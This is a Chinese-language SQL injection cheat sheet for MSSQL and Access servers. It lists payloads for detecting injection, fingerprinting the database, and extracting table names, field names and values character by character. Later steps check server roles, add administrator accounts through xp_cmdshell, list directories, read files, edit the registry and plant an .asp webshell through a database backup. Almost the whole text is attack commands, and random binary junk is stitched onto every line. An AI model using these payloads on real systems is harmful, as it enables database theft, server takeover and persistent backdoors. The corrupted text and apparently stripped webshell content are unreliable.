1.判断是否有注入;and 1=1 ;and 1=2 f2y�gN6(>�
2.初步判断是否是mssql ;and user>0 f�4YcZyBGv
^BIB'/Kh)�
3.注入参数是字符'and [查询条件] and ''=' [y-0w.V=oE
Jw�G$lGN�J
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S&_Z�,mT./
M��}�=X/*T
5.判断数据库系统 �"
2A�`M~
Wew'bj�
�
;and (select count(*) from sysobjects)>0 mssql xS?�[v�&"2
^ZV�1Ev8T6
;and (select count(*) from msysobjects)>0 access (7^5j�o[D
f1w&D ]|S+
rO�Q@(aUAZ
&6<>�hqR^�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 1)�y�Ex��1
K>iM�6U�v�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �:tU&d(�8�
-9T�N�U7�^
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 a�NLRUdc�.
H_RV#�BW�&
9.(1)猜字段的ascii值(access) l/0"'o_0v#
11t�+
a,fM
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 .�RF���ijr
G�x�/�sJ(�
(2)猜字段的ascii值(mssql) {`?C�5<�r
*'4+kj�7>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 %E��kV-%o*
�=?g26>dYo
10.测试权限结构(mssql) Z-��X(.��Q
bC*( ,n<�'
{R�<0��'JU
�zi�ZLw$�)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *W,tq�(%tQ
J&I��g%&/�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �g$�bbm}6S
L����c�4\i
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?#�~3%$��>
lZ�]x #v
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- g�(Q��)fw�
Q�Ji�U"1��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Y3@\uM�`2#
S�. my" �j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- '-C%?�*ku�
vF
y�l,S5A
;and 1=(select IS_MEMBER('db_owner'));-- c��1 a�CN
"Kky|(EQ$$
�N����f�e�
v"��w�xHro
11.添加mssql和系统的帐户 t��gmG�#b*
�R�W| LL@r
;exec master.dbo.sp_addlogin username;-- mHCp^g�4�Q
;exec master.dbo.sp_password null,username,password;-- �(Z(O7X(/�
U�8TH}�9Q
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- BkywYCWZ )
�Y��'��K+O
;exec master.dbo.xp_cmdshell 'net user username password t��8Sv���U
]^aO�YtK�X
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- r\nKJdh;ka
}nh!dVA8lh
;exec master.dbo.xp_cmdshell 'net user username password /add';-- U�Q]W��BS\
F<FNZQ@<U�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- -Pds7}F��8
�H�'2&�3v�
1^&��qlnqH
j��w6�3s�n
12.(1)遍历目录 @c��3GJ'"X
Rdb[{Ruxb
;create table dirs(paths varchar(100), id int) <�X��@XbM
w7Fz�(`\��
;insert dirs exec master.dbo.xp_dirtree 'c:\' �uu0"k<�Tp
_cPG�S=Ew�
;and (select top 1 paths from dirs)>0 NQB���a+N
W)�F<�<B,
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) JF{yhx,+�p
a�bog�\��0
%#5\^4$z|N
�Dsq_}6l{
(2)遍历目录 D*7���JE��
Y)~Y;�;/G�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Y:o\qr�!�Y
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 %Dy�u��kUJ
Gg'�s�gn
�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 JH3�$G,:zM
|5J'��`1W�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �V�yy;mEBg
KmF"��C�cc
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ,q9nH�ZG^
�)9F�� �o
o>Fc.$�ngZ
RWy�DX_z#<
13.mssql中的存储过程 Vo1�,{"��k
�s?-@8.�@�
xp_regenumvalues 注册表根键, 子键 )��w.+( v(
f3�r�\�X��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 M�1�nH!A~o
g2?kC^=�z=
xp_regread 根键,子键,键值名 �"��&$ [@c
^:krf�XT��
;exec xp_regread hA?Fl�q2QV
0�%x"Va~"z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 p2��m@0ou�
"gt-�bo.,
xp_regwrite 根键,子键, 值名, 值类型, 值 6yn34�'yw
j�?c"�BF�.
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 F7f�psAt7�
%E�<.\\^�%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 U%�.%:'eV=
g+(����Cs�
xp_regdeletevalue 根键,子键,值名 �4KbO�y�TQ
6_UC�Ro5h%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 @*Y"�[\�"$
'gBGZ?^N!U
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 j� 3/ �I�=
�s&B�k�@a8
c>�SFt�tbU
5Z�8�Z��b.
14.mssql的backup创建webshell +qPpPj�G�;
,�\){-H/�n
use model �E�&;��[E�
C�0f<xhp?j
create table cmd(str image); Bqcih$`BVU
cd&^ vQL8�
insert into cmd(str) values (''); a:q>�7V|%$
�:|���� s�
backup database model to disk='c:\l.asp'; 4�n9".UH�h
!O�*'m���X
i�X&eQ�{LB
i}tBB�~]��
15.mssql内置函数 ��st_.~m!/
k<&zV��V�'
;and (select @@version)>0 获得Windows的版本号 A{Kc"s4fO
�%yyvB5Y^�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa RZY[�DoF8u
@Sr�{6g�*I
;and (select user_name())>0 爆当前系统的连接用户 {th=Mld�J?
sn!E$ls3�O
;and (select db_name())>0 得到当前连接的数据库 Q1 t-Z;��X
@p$�Nw.{'�
�y
4�
wV]1
"V=�IG{.��
16.简洁的webshell I �~U1vtgp
)7a�UDsu>4
use model 9V'ok�.B.x
&gxWdG}qx]
create table cmd(str image); B|�f
=h�lY
mBwM=L�A�Z
insert into cmd(str) values (''); B5A/Iv�)�2
�w$)NW57[|
backup database model to disk='g:\wwwtest\l.asp';
